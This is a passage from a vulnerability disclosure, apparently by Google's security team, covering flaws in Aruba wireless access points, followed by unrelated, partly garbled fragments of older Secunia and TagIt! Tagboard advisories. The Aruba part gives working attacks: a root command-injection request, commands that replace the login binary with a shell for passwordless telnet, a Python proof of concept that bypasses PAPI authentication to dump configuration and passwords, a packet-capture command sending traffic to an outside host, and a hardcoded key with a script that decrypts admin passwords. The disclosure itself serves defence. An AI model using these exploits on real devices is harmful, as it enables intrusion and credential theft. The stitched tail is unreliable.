support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601 ------------------------------------------------------ 8. AP: Unusual account identified ("arubasecretadmin") ------------------------------------------------------ The AP's system user configuration contains a undocumented account called "arubasecretadmin". This account was the root cause for CVE-2007-0932 and allowed administrative login with a static password. /etc/passwd: nobody:x:99:99:Nobody:/:/sbin/nologin root:x:0:0:Root:/:/bin/sh admin:x:100:100:Admin:/:/bin/telnet3 arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2 serial:x:102:100:Serial:/:/bin/telnet4 Further tests indicated that login with this account seems not possible as it is not mapped through Arubas authentication mechanisms. The reason for it being still configured on the system is unknown. --------------------------------------- 9. AP: Privileged remote code execution --------------------------------------- Insufficient checking of parameters allows an attacker to execute commands with root privileges on the AP. The vulnerable parameter is "image_url" which is used in the Firmware update function. GET /swarm.cgi?opcode=image-url-upgrade&ip=127.0.0.1&oper_id=6&image_url=Aries@http://10.0.0.1/?"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf`"&auto_reboot=false&refresh=true&sid=OWsiU5MM7DxVf9FRWe3P&nocache=0.9368100591919084 HTTP/1.1 The above example starts a new instance of mini_httpd on tcp/1234, which allows browsing the AP's filesystem. The following list of commands, if executed in order, start a telnet service that allows passwordless root login. killall -9 utelnetd touch /tmp/telnet_enable echo \#\!/bin/sh > /bin/login echo /bin/sh >> /bin/login chmod +x /bin/login /sbin/utelnetd Connecting to the telnet service started by the above command chain: # telnet 10.0.XX.XX Trying 10.0.XX.XX... Connected to 10.0.XX.XX. Escape character is '^]'. Switching to Full Access /aruba/bin # echo $USER root /aruba/bin # Potential exploits of this vulnerability can be detected through the AP's log file: [...] Jan 1 02:43:47 cli[2052]: <341004> <WARN> |AP 00:0b:86:XX:XX:XX2@10.0.XX.XX cli| http://10.0.XX.XX/?"`/sbin/utelnetd`" [...] ------------------------------------------------------- 10. AP: Radius passwords allow arbitrary raddb commands ------------------------------------------------------- Insufficient checking of the GET parameter "cmd" allows the injection of arbitrary commands and configuration parameters in the raddb configuration. Example: GET /swarm.cgi?opcode=config&ip=127.0.0.1&cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27&refresh=false&sid=Lppj9jT2xQmYKqjEx5eP&nocache=0.10862623626107548 HTTP/1.1 /aruba/radius/raddb/users: foo Filter-Id == MAC-GUEST, Cleartext-Password := "foo",my-setting=="blah" As shown in the above example, inserting a double-quote in the password allows to add additional commands after the password. ----------------------------------------------------------- 11. AP: Unauthenticated disclosure of environment variables ----------------------------------------------------------- It is possible to request a listing of environment variables by requesting a specific URL on the AP's web server. The request does not require authentication. GET /swarm.cgi?opcode=printenv HTTP/1.1 HTTP/1.0 200 OK Content-Type:text/plain; charset=utf-8 Pragma: no-cache Cache-Control: max-age=0, no-store Environment variables CHILD_INDEX=0 PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/lib SERVER_SOFTWARE= SERVER_NAME=10.0.XX.XX GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0 SERVER_PORT=4343 REQUEST_METHOD=GET SCRIPT_NAME=/swarm.cgi QUERY_STRING=opcode=printenv REMOTE_ADDR=10.0.XX.XX REMOTE_PORT=58804 HTTP_REFERER=https://10.0.XX.XX:4343/ HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0 HTTP_HOST=10.0.XX.XX:4343 ----------------------------------------------------------------- 12. AP: Information disclosure by firmware checking functionality ----------------------------------------------------------------- When the AP checks device.arubanetworks.com for a new firmware version, it sends detailed information of the AP in plaintext to the remote host. POST /firmware HTTP/1.1 Host: device.arubanetworks.com Content-Length: 2 Connection: keep-alive X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: ***REMOVED (Company Internal Name)*** X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000 ---------------------------------------------------------- 13. AP: Unauthenticated automated firmware update requests ---------------------------------------------------------- The web frontend of the AP provides functionality to initiate an automated firmware update. Doing so triggers the AP to initiate communication with device.arubanetworks.com and automatically download and install a new firmware image. The CGI opcode for that automatic update is "image-server-check" and it was discovered that the "sid" parameter is not checked for this opcode. Therefor an attacker can issue the automatic firmware update without authentication by sending the following GET request to the AP. GET /swarm.cgi?opcode=image-server-check&ip=127.0.0.1&sid=x As shown above, the "sid" parameter has to be submitted as part of the URL, but can be set to anything. Although all opcode actions follow the same calling scheme, "image-server-check" was the only opcode where the session ID was not validated. Combined with other vulnerabilities (#14, #15), this could be exploited to install an outdated, vulnerable firmware on the AP. ---------------------------------------------------- 14. AP: Firmware updater does not check certificates ---------------------------------------------------- The communication between AP and device.arubanetworks.com is secured by using SSL. The AP does not do proper certificate validation for the communication to device.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a self-signed certificate allowed interception of the traffic between AP and device.arubanetworks.com. -------------------------------------------------- 15. AP: Forceful downgrade of FW versions possible -------------------------------------------------- When checking device.arubanetworks.com for a new firmware image, the AP sends it's current version to the remote host. If there is no new firmware available, device.arubanetworks.com does not provide any download options. If the initial version sent from the AP is modified by an attacker (via MiTM), the remote server will reply with the current firmware version. The AP will then reject that firmware, as it's current version is more recent/the same. Downgrading the version does also not work based on the validation the AP does. This behaviour can be overwritten if an attacker intercepts and modifies the reply from device.arubanetworks.com and adds X-header called "X-Mandatory-Upgrade". Example of a spoofed reply from device.arubanetworks.com: HTTP/1.0 200 OK Date: Wed, 11 Nov 2015 12:12:20 GMT Content-Length: 91 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check X-Mandatory-Upgrade: true Connection: close 6.4.2.6-4.1.1.10_51810 23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810 As shown above, the Header "X-Mandatory-Upgrade" was added to the server's reply. This causes the AP to skip its validation checks and accept any firmware version provided, regardless if it is the same or older than the current one. ----------------------------------------------------------- 16. AP: Firmware update check discloses machine certificate ----------------------------------------------------------- While observing the traffic between an AP and device.arubanetworks.com, it was discovered that the AP discloses it's machine certificate to the remote endpoint. POST /firmware HTTP/1.1 Host: 10.0.XX.XX Content-Length: 2504 Connection: close X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: ***REMOVED (Company Internal Name)*** X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000 X-Challenge-Hash: SHA-1 -----BEGIN CERTIFICATE----- MIIGTjCCBTagAwI... [...] -----END CERTIFICATE----- The certificate sent in the above request is the same (in PEM format) as found under the following path on the AP: /tmp/deviceCerts/certifiedKeyCert.der Comparison of the certificate from the HTTP Request and from the AP filesystem: $ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 dumped-fw-cert.txt 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 certifiedKeyCert.der.pem --------------------------------------------------------- 17. AP: Firmware is downloaded via unencrypted connection --------------------------------------------------------- Firmware images are downloaded via unencrypted HTTP to the AP. An example reply containing the download paths looks as follows: HTTP/1.1 200 OK Date: Wed, 11 Nov 2015 13:18:58 GMT Content-Length: 552 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check Connection: close 6.4.2.6-4.1.1.10_51810 25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810 30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810 15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810 10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810 23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810 26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810 An attacker could potentially MiTM connections to images.arubanetworks.com and possibly replace the firmware images downloaded by the AP. ---------------------------------------------------------------------- 18. AP: Firmware update Challenge/Response does not protect the Client ---------------------------------------------------------------------- The update check process between AP and device.arubanetworks.com works as follows: AP => device.arubanetworks.com POST /firmware X-Type: firmware-check AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4... X-Challenge: 123123... AP => device.arubanetworks.com POST /firmware X-Session-Id: bd4... [machine certificate] [signature] AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4... [firmware image urls] When inspecting the communication process carefully, it is clear that the final response from device.arubanetworks.com does not contain any (cryptographic) signature. An attacker could impersonate device.arubanetworks.com, send an arbitrary challenge, ignore the response and just reply with a list of firmware images. The only thing that has to be kept the same over requests is the X-Session-Id header, which is also sent initially by the remote host and not the AP and therefore under full control of the attacker. ------------------------------------------ 19. AP: Unencrypted private keys and certs ------------------------------------------ The AP firmware image contains the unencrypted private key and certificate for securelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key and cert was found under the path /aruba/conf/cpprivkey.pem. $ openssl x509 -in cpprivkey.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 121426 (0x1da52) Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL, CN=GeoTrust DV SSL CA Validity Not Before: May 11 01:22:10 2011 GMT Not After : Aug 11 04:40:59 2017 GMT Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF, C=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See www.geotrust.com/resources/cps (c)11, OU=Domain Control Validated - QuickSSL(R) Premium, CN=securelogin.arubanetworks.com [...] $ openssl rsa -in cpprivkey.pem -check RSA key ok writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA…. [...] -----END RSA PRIVATE KEY----- --------------------------------------- 20. AP: Potential signature private key --------------------------------------- A potential SSL key was found under the path /etc/sig.key. Based on the header (3082xxxx[02,03]82), the file looks like a SSL key in DER format: $ xxd etc/sig.key 00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q.... It was not possible to decode the key. Therefore it's not 100% clear if is an actual key or just a garbaged file. ------------------------------------------------ 21. AP: PAPI Endpoints exposed to all interfaces ------------------------------------------------ The PAPI endpoint "msgHandler" creates listeners on all interfaces. Therefore it is reachable via wired and wireless connections to the AP. This increases the potential attack surface. # netstat -nlu | grep :82 udp 0 0 :::8209 :::* udp 0 0 :::8211 :::* Additionally the local ACL table of the AP contains a default firewall rule, permitting any traffic to udp/8209-8211, overwriting any manually set ACL to block access to PAPI: 00:0b:86:XX:XX:XX# show datapath acl 106 Datapath ACL 106 Entries ----------------------- Flags: P - permit, L - log, E - established, M/e - MAC/etype filter S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror I - Invert SA, i - Invert DA, H - high prio, O - set prio, C - Classify Media A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6 K - App Throttle, d - Domain DA ---------------------------------------------------------------- 1: any any 17 0-65535 8209-8211 P4 [...] 12: any any any P4 00:0b:86:XX:XX:XX# ------------------------------------------------------ 22. AP: PAPI Endpoint does not validate MD5 signatures ------------------------------------------------------ MD5 signature validation for incoming PAPI packets is disabled on the AP: # ps | grep msgHandler 1988 root 508 S < /aruba/bin/msgHandler -n # /aruba/bin/msgHandler -h usage: msgHandler [-d] [-n] -d = enable debug prints. -n = disable md5 signatures. -g = disable garbling. The watchdog service ("nanny") also restarts the PAPI handler with disabled MD5 signature validation: # grep msgH /aruba/bin/nanny_list RESTART /aruba/bin/msgHandler -n -------------------------------------------------------------- 23. AP: PAPI protocol encrypted with weak encryption algorithm -------------------------------------------------------------- PAPI packets sent to an AP contain an encrypted payload. The encryption seems to replace the MD5 signature check as described in #4 and used when PAPI is sent from AP to AMP. This might also explain why the PAPI endpoint runs with disabled MD5 signature verification on the AP (see #22). The following example shows an encrypted PAPI packet for the command "show version" as received by the AP: 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................ 0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n.......... 0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................ 0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................ 0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ........... Important parts of the above packet: 7f 00 00 01 Destination IP (127.0.0.1) 0a 00 00 01 Source IP (10.0.0.1) 3b 60 Destination Port (15200) 3b 7e Source Port (15230) 97 93 93 93-EOF Encrypted PAPI payload Comparison of the above packet with a typical PAPI packet that is sent from the AP to the AMP quickly highlights the missing 0x00 that are used to pad certain fields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which is a clear indication that the payload is "encrypted" with a 1 byte XOR. As XOR'ing 0x00 with 1 byte results in the same byte, the payload therefore discloses the key used and use of the weak XOR algorithm: 0x00: 00000000 ^ 0x93: 10010011 ================ 10010011 (0x93) The following shows the above PAPI packet for "show version" with its payload decrypted: 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh 0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version. (The string starting with "zxr..." is a HTTP session ID, see #25 on details how to bypass this). An example Python function for en-/decrypting PAPI payloads could look like this: def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s]) ------------------------------------------- 24. AP: PAPI protocol authentication bypass ------------------------------------------- Besides it's typical use between different Aruba devices, PAPI is also used as an inter-process communication (IPC) mechanism between the CGI based web frontend and the backend processes on the AP. Certain commands that can be sent via PAPI are only supposed to be used via this IPC interface and not from an external source. Besides the weak "encryption" that is described in #23, some PAPI packets contain a HTTP session ID (SID), that matches the SID issued at login to the web frontend. Example IPC packet (payload decrypted as shown in #23): 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a . The SID in the example shown is "zxroCOUwnirdzB5dtVxb". The 0x14 before that indicates the length of the 20 byte SID. If the session is expired or an invalid session is specified, the packet is rejected by the PAPI endpoint (msgHandler). Replacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore allows unauthenticated PAPI communication with the AP. Example IPC packet (Session ID replaced with 20 * 0x00, payload not XOR'ed for readability): 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................ 0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a Using the above example, it is possible to request the system configuration from an AP, bypassing all authentication methods. If the above packet is sent using IPC from the webfrontend cgi to the backend, (localhost) the reply looks like follows: msg_ref 303 /tmp/.cli_msg_SW9iVE The cgi binary then reads this file and renders the content in the HTTP reply. If the PAPI packet comes from an external address (instead of localhost) the reply points to the APs web server (10.0.0.26 in this case) instead of /tmp/: msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh Access to this file does not require authentication which raises the severity of this vulnerability significantly. The following Python script is a proof of concept for this vulnerability, sending a "show configuration" packet to an AP with the IP address 10.0.0.26: import socket def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s]) header = ( '\x49\x72\x00\x03\x7f\x00\x00\x01\x0a\x00\x00\x01\x00\x00\x20\x13' '\x3b\x60\x3b\x7e\x20\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ) payload = ( # show configuration '\x04\x00\x00\x00\x40\x04\x00\x00\x01\xfd\x05\x0a\x00\x00\x01\x06' '\x07\x02\x00\x04\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x13\x73\x68\x6f\x77\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61' '\x74\x69\x6f\x6e\x0a' ) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('', 1337)) sock.sendto(header + aruba_encrypt(payload), ('10.0.0.26', 8211)) buff = sock.recvfrom(4096) print aruba_encrypt(buff[0]) Executing the above PoC: # python arupapi.py [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh Downloading the file referenced by the reply returns the full AP configuration, including all users, passwords and settings (no auth is required on the HTTP request either): # curl -Lk http://10.0.0.26/.cli_msg_n011xh version 6.4.2.0-4.1.1 virtual-controller-country XX virtual-controller-key b49ff***REMOVED*** name instant-XX:XX:XX terminal-access clock timezone none 00 00 rf-band all [...] mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa [...] (full configuration file continues) For APs running in "managed mode", the above shown exploit does not work. The reason for that is, that these APs don't provide a web server and have only a limited set of commands that can be executed via PAPI. Additionally, APs in managed mode do not seem to use the XOR based "encryption" or MD5 checksums - there was no authentication/encryption found at all. One interesting payload for APs in "managed mode" using the limited subset of available commands is the ability to capture traffic and send it to a remote endpoint via UDP. The example command on the controller would be: (aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1 100.105.134.45 1337 0 radio 0 This command would send all traffic of AP 192.168.0.1 from the first radio interface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet would look like this: 0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir.............. 0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6..... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e 0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj 0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect............. 0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............ 0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A 0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU 00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT 00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START. 00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP 00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168. 00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip. 00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45 0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port.. 0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format.. 0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0.. 0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se 0140 63 61 00 00 04 72 6f 6f 74 ca...root When sending this packet to an AP running in managed mode, it confirms the command and starts sending traffic to the specified host: [...]<re><data name="Packet capture has started for pcap-id" pn="true">1</data></re> --------------------------------------------------------- 25. AP: Broadcast with detailed system information (LLDP) --------------------------------------------------------- Aruba APs broadcast detailed system and version information to the wired networks via LLDP (Link Layer Discovery Protocol). 0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2....... 0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86 0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba 0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1 0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4 0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5 0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)........... 0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe .."........eth0. 0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................ 0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l...... 00a0 12 0f 04 06 76 00 00 ....v.. The broadcast packet contains the APs MAC address, model number and exact firmware version.This detailed information could aid an attacker to easily find and identify potential targets for known vulnerabilities. ------------------------------------------------------ 26. AP: User passwords are encrypted with a static key ------------------------------------------------------ Based on the vulnerability shown in #24 which potentially discloses the password hashes of AP user accounts, the implemented hashing algorithm was tested. CVE-2014-7299 describes the password hashes as "encrypted password hashes". The following line shows the mgmt-user configuration for the user "admin" with password "admin": mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa Some testing with various passwords and especially password lengths showed that the passwords are actually encrypted and not hashed (as hash algorithms produce the same length output for different length input): f9ac59cd431e174fb07539a8a811a1aa # admin d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin The encryption algorithm used for the above passwords turned out to be 3DES in CBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded on the AP. Sampling of different Firmware versions confirmed that the key is identical for all available versions. The IV required for 3DES consists of 8 random bytes, and is stored as the first 8 byte of the encrypted password. The following Python script can be used to decrypt the above hashes: import pyDes hashes = ( 'f9ac59cd431e174fb07539a8a811a1aa', # admin 'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin ) key = ( '\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92' '\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03' ) for h in hashes: d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00') print h, '=>', d.decrypt(h.decode('hex')[8:]) Mitigation ========== Aruba released three advisories, related to the issues reported here: http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt Following the resolution advises given in those advisories is strongly recommended. These advisories are also available on the Aruba security bulletin: http://www.arubanetworks.com/support-services/security-bulletins/ For the vulnerabilities related to PAPI, Aruba has made the following document available: http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf This doc gives several advises how to remediate the PAPI related vulnerabilities. An update fixing the issues is announced for Q3/2016. For further information there is also a discussion thread in Aruba's Airheads Community Forum: http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840 Author ====== The vulnerabilities were discovered by Sven Blumenstein from Google Security Team. Timeline ======== 2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day disclosure deadline (2016/04/22). 2016/01/22 - Aruba acknowledges report and starts working on the issues. 2016/02/01 - Asking Aruba for ETA on detailed feedback. 2016/02/03 - Detailed feedback for all reported vulnerabilities received. 2016/02/16 - Answered several questions from the feedback, asked Aruba for patch ETA. 2016/02/29 - Pinged for patch ETA. 2016/03/08 - Pinged for patch ETA. 2016/03/12 - Received detailed list with approx. ETA for patch releases and current status. 2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. 2016/03/24 - Asked Aruba for exact patch release dates. 2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch update for 2016/04/30 (past 90 day deadline). 2016/04/14 - 14 day grace period for disclosure was granted, according to the disclosure policy. New disclosure date was set to 2016/05/06. 2016/05/02 - Asking for status of still unreleased 'end of April' update. 2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace period). 2016/05/03 - Aruba released three advisories on http://www.arubanetworks.com/support-services/security-bulletins/ 2016/05/06 - Public disclosure. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 1) A boundary error within the management interface can be exploited to cause a heap-based buffer overflow by sending overly long strings as credentials. 2) An error in the guest account authentication process within the Captive Portal can be exploited to e.g. gain access to administrative sections without specifying a password. https://support.arubanetworks.com PROVIDED AND/OR DISCOVERED BY: John Munther and Maxim Salomon, n.runs AG ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052382.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052380.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249. TagIt! Tagboard Is register_globals When is enabled, PHP A remote file inclusion vulnerability exists. This vulnerability CVE-2006-5249 Is a different vulnerability.By a third party, within the following parameters URL Through any PHP The code may be executed. TagIt! Tagboard 2.1.B Build 2 and earlier versions have vulnerabilities. TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible

